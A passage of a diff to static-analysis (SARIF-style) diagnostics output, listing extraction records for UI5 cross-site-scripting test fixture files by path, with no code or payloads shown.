: [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 